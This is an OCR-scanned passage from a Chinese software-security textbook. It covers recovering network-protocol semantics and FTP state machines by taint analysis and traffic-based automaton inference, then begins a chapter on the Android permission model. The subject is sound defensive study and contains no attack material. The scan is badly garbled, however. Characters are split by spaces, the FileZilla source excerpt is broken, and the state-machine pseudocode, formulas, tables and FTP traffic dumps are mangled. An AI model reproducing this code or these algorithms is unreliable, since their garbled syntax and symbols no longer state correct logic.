MacOS Objective C Runtime SecureTransport NA 

Android NDK, Android SDK Android SSLSocket System. map 














基础 功能 库 软 件 是 软件 开发 过 程 中 直接 关联 的 支撑 代码 库 , 它 提供 了 软件 开发 各 类 
基本 功能 的 逻辑 封装 ,同时 也 为 程序 员 使 用 操作 系统 的 资源 和 功能 提供 接口 。 系 统 调 用 
则 是 任何 软件 使 用 操作 系统 内 核 提供 的 资源 和 功能 的 最 终 人 口 。 其 他 扩展 功能 库 也 是 为 
了 提供 某 类 特定 功能 而 引入 目标 软件 的 ,如 为 了 提供 信息 加 密 功能 ,必须 使 用 Cryptopp 
或 者 OpenSSL 等 开发 库 。 为 了 开发 调试 和 故障 处 理 的 需要 ,各 类 功能 库 软 件 的 软件 接口 
均 有 较为 详细 的 语义 信息 。 如 果 目 标 协议 实现 的 协议 字段 与 基础 功能 库 接口 存在 关联 ， 
则 可 以 据 此 推断 其 语义 。 所 有 软件 几乎 都 会 使 用 基础 功能 库 和 系统 调用 ,因此 协议 逆向 
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的 大 多 数 语义 均 来 自 这 两 类 软件 库 提 供 的 公开 语义 信息 库 。 

研发 中 不 同 的 软件 运行 环境 也 对 语义 提取 采用 的 技术 和 方法 产生 一 定 影响 。 如 针对 
C 或 Ct+ 等 静态 编译 成 二 进 制 代码 的 程序 ,仍然 能 够 沿用 前 面 提 到 的 基于 二 进 制 程序 动 
态 执行 的 数据 流 和 控制 流 分 析 的 方法 。 而 基于 Java, Python 和 Android SDK 环境 开发 
的 需要 解释 翻译 执行 的 软件 , 则 需要 模拟 解释 器 在 中 间 代 码 层 对 程序 进行 动态 追踪 。 
为 虽然 在 解释 器 之 外 也 能 提取 到 执行 指令 ,但 该 指令 由 解释 器 执行 代码 与 目标 软件 自身 
代码 交错 混合 组 成 ,难以 区 分 , 比 基 于 中 间 代 码 的 分 析 难 度 高 出 很 多 。 

前 面 使 用 的 一 个 基本 方法 是 从 接收 到 的 网 络 消息 开始 做 污点 传播 ,基于 污点 传播 提 
取 的 和 网 络 消息 关联 的 指令 进行 分 析 , 实 现 字段 切 分 和 关系 识别 。 本 节 的 语义 信息 逆向 
也 可 以 基于 该 方法 来 提取 部 分 消息 字段 的 语义 ,如 FTP 协议 有 RETR 命令 ,客户 端 通过 
发 送 该 命令 到 服务 器 端 获取 指定 的 文件 ,本 书 截取 的 FileZilla Server 0. 9. 43 服务 器 程序 
的 部 分 相关 源 代码 如 下 : 

如 果 客 户 端 连接 服务 器 发 出 的 请 求 为 RETR test. zip, 其 中 消息 类 型 为 RETR, 消 息 
的 参数 为 请 求 下 载 的 文件 名 ,其 值 为 test. zip。 图 10-22 所 示 的 源 代码 中 黑体 部 分 标注 了 
请 求 的 文件 名 ,从 中 可 看 到 文件 名 被 引用 的 记录 。 假 设 test. zip 文件 名 为 未 知 语义 字段 
U, 则 污点 传播 技术 通过 追踪 U 的 引用 记录 ,最 终 能 够 发 现 U 是 GetFileAttribute 的 一 个 
合法 参数 ( 见 图 中 741 行 的 代码 ) ,那么 该 函数 的 参数 的 具体 含义 就 可 以 解释 未 知 字段 U 
的 语义 。 

//ControlSocket.cpp 
519: void CControlSocket::ParseCommand() 

E A CStdString command; 


526: CStdString args; 
527: if (IGetCommand(command, args)) 





528: return; 

1075: | case COMMAND RETR: 

1076: ( 

1102: CStdString physicalFile, logicalFile; 

1103: int error - m pOwner-^m pPermissions-^CheckFilePermissions(m status.user, 


args. m CurrentServerDir, FOP READ, physicalFile, logicalFile); 


//Permissions.cpp 

694: int CPermissions::CheckFilePermissions(LPCTSTR usemame, CStdString filename, 
CStdString currentdir, int op, CStdString& physicalFile, CStdString& logicalFile) 

695: ( 


740: — physicalFile = directory.dir + "\" + filename; 
741: DWORD nAttributes = GetFileAttributes (physicalFile): 


} 
图 10-22 FileZilla Server 0. 9. 43 软件 RETR 命令 的 解析 和 使 用 过 程 


在 MSDN 文档 库 中 ,GetFileAttribute 的 语义 如 下 所 示 ,该 函数 用 于 获取 指定 路 径 文 
件 的 文件 属性 , 且 只 有 一 个 参数 : 指定 文件 的 路 径 。 那 么 可 以 依 此 初步 判断 U 是 文件 路 
径 或 者 文件 路 径 的 一 个 组 成 部 分 , 即 一 般 来 说 也 可 能 是 文件 名 或 者 文件 目录 。 
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1. Syntax 
DWORD WINAPI GetFileAttributes( 
.In LPCTSTR lpFileName 

) 7 
2. Parameters 
lpFileName [in] 

The name of the file or directory. 

In the ANSI version of this function, the name is limited to MAX PATH characters. To 
extend this limit to 32,767 wide characters, call the Unicode version of the function and 
prepend "\\? V" to the path. 


10.3 协议 状态 机 恢复 


协议 状态 机 是 网 络 协议 的 关键 组 成 元 素 ,恢复 协议 状态 机 是 实现 网 络 协议 逆向 的 重 
要 步骤 。 

FTP 的 RFC 文档 9 在 “State Diagrams” 这 一 节 详 细 描述 了 FTP 的 协议 状态 机 。 
FTP 协议 是 基于 请 求 -应 答 机 制 的 协议 ,因此 协议 的 每 一 个 命令 都 有 自身 单独 的 状态 机 。 
FTP 协议 的 大 多 数 请 求 -应 答 状 态 转换 模式 有 相似 性 ,比如 针对 ABOR, ALLO, DELE, 
CWD, CDUP, SMNT, HELP, MODE, NOOP, PASV, QUIT, SITE, PORT, SYST, 
STAT,RMD,MKD,PWD,STRU fil TYPE 等 请 求 ,FTP 状态 机 如 图 10-23 (a) Bro , #F 
对 APPE,LIST,NLST, REIN, RETR,STOR 和 STOU 等 请 求 的 FTP 状态 机 如 图 10-23 Cb) 
所 示 , 这 两 类 消息 的 状态 机 只 有 细微 差别 。 而 用 户 登 录 请 求 涉及 多 个 请 求 类 型 ,其 状态 机 
要 更 复杂 ,如 图 10-23(c) 所 示 。 其 中 USER, PASS 和 ACCT 为 输入 消息 ,输入 消息 触发 
状态 转换 ,数字 为 消息 应 答 的 缩 略 表示 ,对 应 RFC 中 消息 应 答 码 的 首位 数字 。 

协议 状态 机 的 逆向 要 解决 的 关键 问题 包括 消息 类 型 识别 ,状态 机 推断 和 状态 机 化 简 。 
其 中 消息 类 型 识别 是 前 文 消息 格式 识别 方法 的 自然 延伸 ,从 单个 消息 的 内 部 结构 识别 扩 
展 到 多 个 消息 之 间 类 型 的 区 分 识别 , 即 要 回答 的 问题 是 : 未 知 类 型 的 两 个 消息 是 否 可 以 
归于 同一 类 。 状 态 机 推断 是 要 逆向 恢复 出 客户 端 和 服务 端 处 理 和 发 送 消息 的 规则 , 即 接 
收 特定 类 型 消息 后 的 行为 (包括 如 何 发 送 消息 ,发送 什么 类 型 的 消息 或 者 不 发 送 消 息 ) 。 


1031 协议 消息 类 型 识别 


协议 消息 类 型 是 协议 语义 层面 的 信息 ,协议 约定 中 语义 的 模糊 性 描述 导致 无 法 严格 
依据 语义 对 协议 类 型 进行 区 分 ,难以 给 出 严格 界定 消息 类 型 的 方法 。 通 常 语 义 可 以 分 为 
多 个 层次 ,同一 个 消息 在 不 同 语义 层次 上 有 着 不 同 的 消息 类 型 。 

针对 FTP 协议 ,消息 可 以 划分 为 请 求 和 应 答 两 种 类 型 ,同时 这 两 种 类 型 又 各 自 可 以 
划分 出 多 种 类 型 ,图 10-24 中 序号 为 8、11、24、27、30 的 消息 为 请 求 类 型 ,而 其 他 消息 为 应 
答 类 型 。 在 RFC 规范 中 ,请求 类 型 的 格式 均 为 命令 字符 串 、 空 格 以 及 命令 参数 3 部 分 按 


(D https://www. ietf. org/rfc/rfc959. txt. 
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开始 状态 ESSE 请 求 成 功 
二 请 求 失败 

(a) 针对 ABOR 等 请 求 的 FTP 状 态 机 
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(b) 针对 APPE 等 请 求 的 FTP 状 态 机 
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45 
(c) FTP 协 议 用 户 登录 状态 机 
图 10-23 针对 部 分 消息 序列 的 FTP 协议 状态 机 


顺序 连接 组 成 ,而 响应 类 型 的 消息 格式 均 为 3 位 数字 编码 .空格 以 及 详细 信息 等 3 部 分 按 
顺序 连接 组 成 。 那么 要 区 分 请 求 类 型 消息 和 响应 类 型 消息 , 则 只 需要 查看 第 一 个 字母 是 
TBH ASCI 数字 字符 即 可 。 而 要 有 效 区 分 属于 请 求 类 型 的 多 种 子 消息 类 型 , 则 需要 进 一 
步 了 解 请 求 消息 类 型 的 命令 编码 。 例 如 图 10-24 中 出 现 的 FTP 请 求 消息 的 类 型 包括 
USER、PASS、opts,FTP 响应 请 求 消息 的 类 型 包括 220、331、530、230。 

上 述 FTP 协议 消息 的 类 型 识别 信息 来 自 标准 的 RFC 协议 规范 ( 即 消 息 的 前 3 个 字 
节 或 4 个 字 节 形成 的 字段 可 以 标识 协议 消息 的 类 型 ) ,而 如 果 针 对 未 知 协议 , 则 需要 另外 
寻找 消息 类 型 划分 的 方法 。 标 识 协 议 消 息 类 型 的 字段 通常 都 是 协议 的 关键 字 , 基 于 关键 
字 能 迅速 实现 消息 类 型 的 区 分 ,前 面 已 经 对 关键 字 的 识别 方法 做 了 讲解 ,这 里 不 再 著述 。 
基于 关键 字 识 别 的 类 型 识别 方法 的 主要 问题 是 其 准确 性 完全 依赖 于 关键 字 识 别 , 如 果 由 
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序号 Wu AS 
4 FTP Response: 220-Filezilla server version 0.9.41 beta 0x3232302046696C655A! 
5 FTP Response: 220-written by Tim Kosse (Tim.Kosse&gmx. de) 0x323230207772697474: 
7 FTP Response: 220 Please visit http://sourceforge.net/projects/filezilla/ 0x32323020506C656173: 
8 FTP Request: USER anonymous 0x5553455220616E6F6E: 
10 FTP Response: 331 Password required for anonymous 0x333331205061737377: 
11 FTP Request: PASS User& 0x504153532055736572. 
13 FTP Response: 530 Not logged in, user account has been disabled 0x353330204E6F74206ci 
20 FTP Response: 220-Filezilla server version 0.9.41 beta 0x3232302046696C655A! 
21 FTP Response: 220-written by Tim Kosse (Tim.Kosse&gmx. de) 0x323230207772697474! 
23 FTP Response: 220 Please visit http://sourceforge.net/projects/filezilla/ 0x32323020506C656173! 
24 FTP Request: USER test 0x555345522074657374! 
26 FTP Response: 331 Password required for test 0x333331205061737377i 
27 FTP Request: PASS test 0x504153532074657374! 
29 FTP Response: 230 Vogga on 0x323330204C6F6767651 
30 FTP Request: opts utf8 0x6F707473207 5746638: 
32 FTP Response: 200 UTF8 zu enabled 0x323030205554463820! 


图 10-24 FTP 协议 消息 


于 关键 字 识 别 方法 的 局 限 性 导致 在 消息 中 没有 发 现 关键 字 , 则 该 方法 完全 失效 ;如 果 消 息 
存在 多 个 关键 字 (HTTP 协议 ), 则 目前 还 无 法 判断 是 其 中 一 个 还 是 多 个 关键 字 能 够 有 效 
标识 协议 类 型 。 

除了 基于 关键 字 的 消息 类 型 识别 方法 以 外 ,还 可 以 基于 消息 特征 进行 聚 类 分 析 ,合并 
相似 的 消息 ,从 而 实现 消息 类 型 的 区 分 。 消 息 的 特征 可 以 大 致 分 为 两 类 , 即 消息 文本 特征 
和 消息 的 程序 行为 特征 。 消 息 文本 特征 主要 是 基于 消息 本 身 提取 文本 特征 ,或 者 直接 将 
消息 全 文 作为 特征 进行 相似 性 匹配 实现 聚 类 分 析 。 而 消息 的 程序 行为 特征 主要 是 指 在 协 
议 实 现 程序 在 接收 消息 后 进行 处 理 时 的 指令 执行 行为 特征 ,主要 包括 程序 执行 过 程 中 的 
进程 行为 网 络 操作 、 文 件 操作 甚至 具体 代码 块 的 特征 。 

基于 消息 文本 特征 的 分 类 方法 在 本 书 中 不 予 讨 论 。 基 于 消息 的 程序 行为 特征 的 分 类 
方法 主要 是 从 协议 实现 在 处 理 消息 过 程 中 的 程序 行为 中 提取 特征 ,提取 的 特征 可 以 大 致 
分 为 两 类 : 指令 基本 特征 和 输出 行为 特征 。 

指令 基本 特征 主要 是 指 从 执行 的 指令 本 身 提取 的 特征 ,详细 情况 如 表 10-8 所 示 。 


表 10-8 指令 基本 特征 











类 a 形式 特 dE 说 明 
系统 调用 集合 | 系统 调用 序号 处 理 消息 过 程 中 所 有 发 生 的 系统 调用 
进程 行为 集合 | 进程 相关 系统 调用 序号 进程 创建 .销毁 等 行为 (CreateProcess、 
ShellExecute) 





本 地 函数 调用 “| 集合 | 程序 内 部 的 函数 调用 地 址 aii 

















库 函 数 调用 集合 | 第 三 方 库 函 数 调用 地 址 Call 指令 的 地 址 ,该 地 址 需 在 程序 代码 
段 之 外 
- 所 有 执行 指令 的 EIP, 该 地 址 需 在 程序 
执行 指令 地 址 集合 | 指令 EIP rope 





程序 输出 行为 特征 主要 是 指 程序 指令 执行 过 程 中 对 系统 资源 和 其 他 网 络 资源 施加 的 
影响 行为 特征 ,如 Socket 写 入 、 文 件 写 入 、 控 制 台 输 出 等 。 
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1032 状态 机 推断 和 化 简 


本 节 介绍 的 状态 机 推断 是 基于 客户 端 和 服务 器 端 之 间 交 换 的 网 络 消息 构建 有 限 状 态 
机 ,该 状态 机 要 求 能 够 接收 所 有 正确 的 消息 序列 ,同时 拒绝 所 有 不 合法 的 消息 序列 。 协 议 
实现 包含 客户 端 和 服务 器 端 , 因 此 其 状态 机 也 包含 对 应 的 两 个 状态 机 。 网 络 协议 实现 本 
身 就 是 完整 的 有 限 自 动机 ,因此 逆向 推断 得 到 的 状态 机 一 定 是 程序 实现 状态 机 的 简化 ,这 
个 简化 的 状态 机 应 当 更 接近 于 RFC 文档 中 约定 的 状态 转换 模型 。 

本 节 讨 论 的 状态 机 都 是 确定 的 有 限 状态 机 。 确 定性 有 限 状 态 机 定义 的 形式 化 表示 通 
常 是 如 下 的 五 元 组 形式 : 

M = (Q,3,6,g,F) 

其 中 ,Q 是 状态 机 所 有 状态 的 集合 ;3 是 状态 机 输入 符号 的 集合 ;6 是 状态 转移 函数 ,定义 
为 一 个 映射 : QXX-Qiq, EQ 是 开始 状态 ,FCQ 是 终结 状态 集合 。 

前 文中 消息 格式 和 类 型 道 向 均 基 于 动态 程序 分 析 方法 进行 ,本 节 的 状态 机 推断 则 主 
要 基于 流量 分 析 进 行 , 即 从 采集 的 协议 流量 中 提取 上 述 有 限 状 态 机 模型 的 各 个 要 素 ,包括 
输入 符号 集合 .状态 集合 .状态 转移 函数 .开始 和 终结 状态 等 。 也 就 是 说 ,需要 找到 一 种 将 
协议 流量 映射 到 有 限 状 态 机 的 方法 。 

网 络 流量 是 没有 明显 边界 的 连续 数据 包 的 序列 ,其 基本 组 成 单元 是 数据 包 , 由 于 其 
能 被 协议 状态 机 接收 ,可 以 近似 认为 一 个 数据 包 对 应 一 条 消息 ,因此 可 以 把 从 网 络 流 
量 中 提取 的 数据 包 ( 消 息 ) 序 列 作为 有 限 状 态 机 的 输入 符号 集合 ,而 且 对 于 通信 某 一 方 
的 确定 有 限 状 态 机 来 说 ,输入 符号 集合 是 其 接收 的 消息 的 集合 。 例 如 对 于 服务 器 端 来 
说 ,其 输入 符号 集合 是 客户 端 发 送 的 消息 的 集合 ;对 于 客户 端 来 说 ,其 输入 符号 集合 是 
服务 器 端 发 送 消息 的 集合 。 需 要 注意 的 是 ,网 络 流量 包含 的 数据 包 存 在 分 片 的 情况 ， 
有 可 能 多 个 数据 包 才 能 构成 一 条 完整 的 消息 .本 节 和 暂时 不 考虑 这 种 情况 (可 通过 数据 
包 重 组 技术 解决 该 问题 ) 。 

协议 状态 机 的 开始 和 终结 状态 的 提取 比较 简单 ,在 接收 (或 发 送 ) 第 一 条 消息 之 前 的 
程序 状态 可 以 视 作 开 始 状 态 , 在 接收 (或 发 送 ) 最 后 一 条 消息 之 后 的 程序 状态 可 以 视 作 终 
结 状态 。 例 如 ,针对 FTP 协议 中 的 服务 器 端 ,在 收 到 客户 端 发 送 的 第 一 条 登录 请 求 消息 
之 前 的 状态 可 以 视 作 开始 状态 ,在 收 到 客户 端的 注销 登录 请 求 并 向 其 发 送 确认 消息 之 后 
的 状态 可 以 视 作 终结 状态 。 而 如 果 流 量 中 提取 的 第 一 条 消息 不 是 登录 请 求 , 而 是 下 载 文 
件 请 求 ,那么 就 得 到 了 错误 的 开始 状态 。 因 此 ,目前 分 析 方 法 需要 采集 的 流量 满足 一 定 条 
件 , 即 获得 符合 协议 规范 要 求 的 从 开始 到 终结 状态 的 流量 。 要 满足 该 先决 条 件 ,首先 要 具 
备 能 够 判断 协议 交互 开始 和 结束 的 能 力 , 大 多 数 网 络 协议 都 比较 容易 判断 ,比如 FTP、 
SMTP, SSH 等 形成 标准 规范 的 协议 ,以 及 网 络 聊天 软件 、 远 程 桌 面 等 未 知 通信 协议 实现 
均 有 明确 的 登录 和 退出 机 制 , 可 以 比较 容易 地 提取 从 开始 到 终结 的 完整 流量 。 此 外 ,如 果 
流量 中 多 个 独立 的 协议 交互 过 程 混合 在 一 起 ,还 需要 通过 IP 地 址 、TCP 流 序号 等 网 络 层 
数据 特征 对 其 进行 拆 分 识别 。 

所 有 从 协议 开始 到 终结 的 通信 流量 划分 为 一 系列 完整 独立 的 协议 交换 过 程 , 比 如 针 
对 FTP 协议 ,流量 包含 客户 端 和 服务 器 端 之 间 登 录 、 列 目录 、 下 载 或 上 传 文件 以 及 注销 等 
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完整 的 交互 流程 ,其 中 登录 和 注销 是 完整 交互 所 必需 的 ,而 其 他 操作 是 可 选 的 。 协 议 交 互 
的 一 个 完整 过 程 在 本 书 中 称 作 一 个 会 话 ,会 话 由 一 个 客户 端 和 一 个 服务 器 端 交互 时 发 送 
的 消息 序列 构成 。 

图 10-25 是 从 FTP 服务 器 与 4 个 客户 端 进行 交互 时 截获 的 流量 中 提取 的 消息 序列 
构成 的 会 话 ( 该 消息 序列 由 客户 端 发 送 到 服务 器 端的 消息 组 成 ) 。 









USER XiaoWang USER XiaoHuang 

PASS test PASS test 

TYPEI TYPE! 

TYPEA TYPEA 

FORT 192,168,4,104,9,74 PORT 192,168,4,105,8,32 
NLST NIST 

TYPE! TYPEI 

PORT 192,168,4,104,9,75 PORT 192,168,4,104,8,33 
RETR README.txt STÖR README.txt 

QUT QUIT 









USERXiaoWang 
PAGS test 
TYPEI 
TYPEA 
PORT 192,1684,107,4,80 
NIST 
TYPEI 
RNFR README.log 
RNTO README.txt 
TYPEA 


USER XiaoZhang 







PORT 192,168,4,111,218,22 
LST 

PORT 192,168,4,111,224,225 
UST 

TYPEI 

























PORT 192,168,4,107,4,81 || poRT 192,168,4,111,130,26 
UST 

RETR RI ME. N 
eei ETR README.log 










QUIT QUT 








会 话 A 会 话 B 会 话 C 会 话 D 
192.168.4.104 192.168.4.105 132.1684.107 192.168.4.105 


图 10-25 FTP 服务 器 接收 的 消息 序列 


协议 状态 机 状态 集合 和 状态 转移 函数 的 逆向 是 本 节 的 关键 , 它 与 基于 消息 序列 进行 
状态 机 构造 的 方法 高 度 相 关 。 这 里 给 出 一 种 简单 的 构造 方法 ,如 下 面 的 “状态 机 推断 ” 算 
法 所 示 ,该 方法 参见 Antunes”! 和 Comparetti? 等 人 的 论文 。 该 方法 能 够 构造 一 个 树 形 
状态 机 ,可 以 简单 地 认为 ,协议 实现 从 客户 端 接收 一 个 消息 到 向 客户 端 发 出 下 一 个 消息 之 
间 时 ,程序 始终 保持 同一 个 状态 ,也 就 是 说 每 当 客 户 端 或 服务 器 端 接收 到 一 个 消息 后 ,其 
状态 就 会 有 改变 。 开 始 状 态 和 终结 状态 分 别 是 所 有 观察 到 的 消息 序列 的 第 一 个 消息 之 前 
的 状态 和 最 后 一 个 消息 之 后 的 状态 。 该 算法 给 出 了 一 种 能 够 接收 所 有 样本 消息 序列 的 状 
态 机 , 即 该 状态 机 仅仅 接收 网 络 流量 给 出 的 消息 序列 。 
协议 状态 机 的 构造 方法 如 下 : 
算法 ”状态 机 推断 
输入 : 会 话 集合 c 
输出 : 有 限 自动 机 s= (9, X, 9, a, E) 
q;-NewState (),Q= (q; ), E- 2,8 (q, s) - undefined, S= (Q,3,6,q,F) 
fors in c: 
Fo% 
formins: 
if ò (qm) =Ø 
q-8 (qm) 


else: 
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pe NewState () 
aUi p)! 
EX-X Utm) 
ò (q,m)-p 
q-p 
F-FUta? 


初始 协议 状态 机 如 图 10-26 所 示 。 
初始 协议 状态 机 一 共 包 含 28 个 状态 ,显然 太 复杂 ,需要 化 简 。 首 先 要 将 输入 消息 类 
型 相同 的 状态 合并 ,方法 如 下 : 


算法 合并 输入 消息 类 型 相同 的 状态 
输入 : 有 限 自动 机 IS <- (Q,3,6,q,F) 
输出 : 有 限 自动 机 IS 
for q in Q: 
for p in Q: 
if 3sEZ; r,tEQ | (qs) =r A 8(p,s) =t: 
MergeStates (r, t) 


该 方法 主要 是 遍历 所 有 状态 ,合并 那些 输入 消息 类 型 相同 的 状态 。 例 如 针对 原始 状 
态 机 ,合并 输入 都 为 QUIT 消息 的 状态 后 可 形成 如 图 10-27 所 示 的 状态 图 (为 了 便于 比 
较 ,也 给 出 了 化 简 前 的 状态 图 )。 

经 过 该 步 化 简 以 后 的 状态 机 如 图 10-28 所 示 ,状态 机 从 28 个 状态 化 简 为 13 个 状态 。 

下 面 对 状 态 机 进一步 化 简 , 方 法 如 下 : 


算法 合并 至 少 有 一 个 后 继 消 息 相 同 且 没有 单 向 因果 关系 的 状态 
输入 : 有 限 自动 机 IS= (8,3,6,q,F) 
输出 : 有 限 自 动机 1s 
ForqinQ 
ForpinQ 
If (A4s€Z:8(g,s)-pV9O (p,s)-q) or (d5,t€ E:0 (,s)-pA8 (p,t)-q) 
If (ds€Z;r€Q:(q,s)-r) A8 (p,s)- x) 
MergeStates (p,q) 
EndIf 
EndIf 
EndFor 
EndFor 


该 方法 主要 是 搜索 当前 所 有 状态 ,合并 至 少 有 一 个 后 继 消息 相同 且 没 有 单 向 因果 关 
系 的 状态 ,该 方法 认为 满足 上 述 条 件 的 状态 可 视 为 等 价 状态 。 例 如 针对 原始 状态 机 , 合 
等 价 状态 S8 和 S10 的 状态 后 可 形成 如 图 10-29 所 示 的 状态 图 (为 了 便于 比较 ,也 给 出 了 
化 简 前 的 状态 图 ) 。 
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图 10-28 合并 有 相同 输入 消息 状态 的 状态 机 
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(b) 合并 后 


图 10-29 合并 等 价 状态 S8 和 S10 


Sa 软件 安全 分 析 与 应 用 


最 终 化 简 得 到 的 状态 机 如 图 10-30 所 示 ,状态 机 从 13 个 状态 化 简 为 8 个 状态 。 





















































图 10-30 状态 机 化 简 的 最 终结 果 


如 果 能 够 获得 完整 的 状态 机 ,需要 枚 举 程序 状态 机 接收 的 所 有 可 能 序列 ,状态 机 推断 
中 使 用 的 会 话 必须 保持 完整 ,从 开始 状态 一 直到 终止 状态 。 该 恢复 方法 能 够 对 初始 状态 
机 进行 必要 的 化 简 ,但 是 不 够 准确 ,主要 原因 在 于 泛 化 过 度 ( 接 收 不 应 被 允许 的 消息 序列 ) 
和 过 于 具体 (只 能 接收 有 限 的 消息 序列 ) ,本 书 不 对 其 进行 讨论 。 另 外 ,由 于 基于 流量 分 析 
重 构 状 态 机 的 方法 只 有 正 例 可 用 ,因此 缺乏 拒绝 接收 的 消息 序列 的 流量 ,导致 状态 机 对 于 
未 知 的 消息 无 法 准确 判断 其 是 否 可 接收 。 


10.4 小 结 


网 络 协议 是 当前 互联 网 发 展 不 可 或 缺 的 重要 组 成 部 分 ,而 针对 网 络 协议 实现 的 分 析 
逐渐 成 为 软件 安全 分 析 的 重要 领域 之 一 ,近年 来 工业 界 和 学 术 界 在 协议 自动 化 逆向 方法 
的 研究 方面 也 取得 了 大 量 成 果 , 并 在 网 络 协 议 的 模糊 测试 、 安 全 性 评估 、 网 络 行为 审计 、 网 
络 人 侵 检测 ,主动 网 络 测量 等 领域 得 到 广泛 应 用 。 

网 络 协 议 逆向 的 主要 目标 是 通过 软件 逆向 分 析 获 取 网 络 协 议 的 消息 格式 、 消 息 类 型 
以 及 协议 状态 机 ,本 章 对 近期 该 方面 的 主要 方法 进行 了 介绍 。 

网 络 协 议 消息 格式 的 逆向 又 包含 3 个 部 分 , 即 字段 划分 .字段 间 关 系 识 别 和 字段 功能 
语义 恢复 。 在 字段 划分 方面 ,本 节 介绍 了 3 种 方法 ,分 别 是 基于 分 隔 符 、 指 令 上 下 文 和 字 
段 来 源 回 漳 的 划分 方法 。 其 中 基于 分 隔 符 的 划分 方法 局 限于 利用 分 隔 符 组 织 字段 结构 的 
文本 型 协议 ;基于 指令 上 下 文 的 字段 划分 方法 依赖 于 调用 栈 深 度 与 字段 处 理 指令 匹配 的 
准确 性 ,可 能 存在 一 定 的 误 识 别 率 ;基于 字段 来 源 回溯 的 划分 方法 由 于 采用 切片 技术 , 提 
取 具 有 相同 来 源 的 字 节 以 恢复 字段 结构 , 较 前 两 种 划分 方法 更 为 准确 。 在 字段 关系 识别 
方面 ,本 章 介绍 了 基于 分 隔 符 作 用 域 识别 字段 关系 的 方法 ,以 及 长 度 字段 的 识别 方法 。 在 
字段 功能 语义 恢复 方面 ,本 章 对 协议 关键 字 的 定义 和 识别 方法 以 及 基于 运行 环境 语义 的 
字段 语义 恢复 方法 进行 了 简单 介绍 。 其 中 关键 字 的 识别 主要 依据 关键 字 作为 字符 串 进 行 
比较 的 局 部 指令 特征 进行 识别 ;而 字段 语义 恢复 基于 程序 切片 方法 ,通过 字段 来 源 与 程序 
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调用 API 参数 的 语义 进行 关联 来 实现 恢复 。 

网 络 协 议 消息 类 型 识别 主要 基于 消息 关键 字 和 接收 消息 触发 的 行为 模式 来 识别 ,其 
中 消息 触发 的 行为 模式 一 般 基于 文件 行为 、 注 册 表 操 作 、 进 程 操 作 和 网 络 行为 提取 。 在 协 
议 状 态 机 逆向 恢复 方面 ,本 章 介绍 了 一 种 将 协议 消息 类 型 作为 输入 的 有 限 自 动机 恢复 方 
法 ,该 方法 恢复 的 状态 机 能 够 接收 所 有 正确 的 消息 序列 。 但 是 由 于 缺少 完备 的 不 正确 的 
消息 序列 ,因此 恢复 的 状态 机 针对 未 知 消息 序列 存在 漏 报 和 误 报 的 可 能 。 

本 章 介绍 的 网 络 协议 逆向 方法 广泛 采用 了 污点 传播 ,程序 切片 等 基础 方法 ,关于 这 些 
基础 方法 可 以 阅读 相关 章节 。 
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移动 智能 终端 应 用 软件 安全 性 分 析 


在 当今 信息 化 社会 中 ,智能 手机 已 成 为 人 们 不 可 或 缺 的 生活 必需 品 。 智 能 手机 因 搭 
载 了 独立 操作 系统 ,使 得 其 在 提供 传统 手机 的 通信 功能 外 ,还 可 以 由 用 户 自 行 安装 第 三 方 
服务 商 提供 的 应 用 程序 来 扩展 功能 ,为 人 们 的 生活 提供 了 极 大 的 便利 。 除 此 之 外 ,智能 家 
电 、 智 能 可 穿戴 设备 也 逐渐 进入 人 们 的 生活 。 

这 些 高 科技 产品 在 丰富 人 们 生活 的 同时 ,也 给 用 户 带 来 了 各 种 各 样 的 安全 问题 ,其 中 
以 智能 终端 应 用 软件 的 安全 问题 最 为 突出 。360 互联 网 安全 中 心 发 布 的 (2016 年 中 国手 
机 安全 状况 报告 指出 ,2016 年 360 互联 网 安全 中 心 共 截获 Android 平台 新 增 恶 意 程 序 
样本 1403. 3 万 个 ,累计 移动 终端 用 户 感染 恶意 程序 2.53 亿 人 次 。 恶 意 程序 类 型 多 样 , 包 
括 隐私 窃取 资费 消耗 、 恶 意 扣 费 . 远 程控 制 等 。 对 智能 终端 应 用 软件 进行 安全 分 析 ,保护 
用 户 使 用 的 安全 已 成 为 智能 终端 应 用 市 场面 临 的 迫切 问题 。 

针对 智能 终端 应 用 软件 的 安全 分 析 研究 已 进行 了 多 年 ,其 间 产 生 了 大 批 的 优秀 工具 
和 学 术 研 究 成 果 ,内容 涉及 隐私 保护 研究 .组 件 安全 研究 . 重 打包 应 用 研究 等 安全 问题 的 
研究 以 及 静态 分 析 技术 \ 动 态 分 析 技术 等 相关 分 析 技 术 的 研究 。 本 音 对 现在 最 受 欢 迎 的 
智能 终端 操作 系统 一 一 Android 平台 下 的 安全 机 制 . 软 件 安 全 问题 及 相关 的 安全 分 析 技 
术 进 行 简要 介绍 ,使 读者 对 相关 领域 目前 的 发 展 状况 有 大 致 的 了 解 。 





11.1 Android 系统 安全 框架 介绍 


1111 权限 机 制 


权限 机 制 是 Android 安全 机 制 的 基础 ,Android 系统 通过 权限 机 制 来 控制 每 个 应 用 
可 访问 的 资源 或 可 执行 的 操作 。 

Android 系统 基于 Linux 内 核 开发 ,自然 而 然 地 继承 了 Linux 内 核 的 安全 机 制 。 
Linux 是 一 个 多 用 户 的 操作 系统 ,以 用 户 为 中 心 进行 访问 控制 ,假设 不 同 用 户 之 间 是 不 可 
信和 的 ,资源 访问 权限 管理 针对 用 户 标识 (UID) 进 行 设计 ,系统 为 不 同 UID 分 配 访问 某 一 
资源 的 不 同 权 限 ,如 图 11-1 所 示 ,文件 mercury. py 的 所 有 者 具备 读 写 权 限 , 其 他 用 户 只 
具备 只 读 权限 。 

Android 在 此 基础 上 设计 了 更 为 细致 的 权限 管理 机 制 。Android 假设 应 用 程序 之 间 
是 不 可 信 的 ,为 每 一 个 应 用 程序 设置 独立 的 UID, 人 允许 应 用 程序 申请 所 需 的 权限 ,将 这 些 
权限 与 应 用 程序 的 UID 绑 定 ,从 而 将 Linux 下 的 用 户 权 限 管理 机 制 巧妙 扩展 为 应 用 程序 
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基本 徽标 OE 打开 方式 #S 


所 有 者 : lulu - ubuntu10.04| 
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an: OH 
EE 

a: COO M 
执行 : id 允许 以 程序 执行 文件 (E) 


SELinux 环境 : 未知 
最 后 修改 : Fri 10 Aug 2012 01:36:32 AM PDT 











11-1 Linux 下 针对 mercury. py 的 文件 权限 管理 


权限 管理 机 制 ,利用 底层 Linux 系统 对 UID 的 资源 访问 控制 机 制 ,控制 应 用 程序 对 系统 
资源 或 其 他 应 用 资源 的 访问 。 此 外 ,通过 设置 sharedUserId, 不 同 Android 应 用 之 间 可 以 
共享 同一 个 UID, 共 享 相同 的 权限 ,文件 mercury. py 的 所 有 者 具备 读 写 权 限 , 其 他 用 户 
只 具备 读 权限 。 

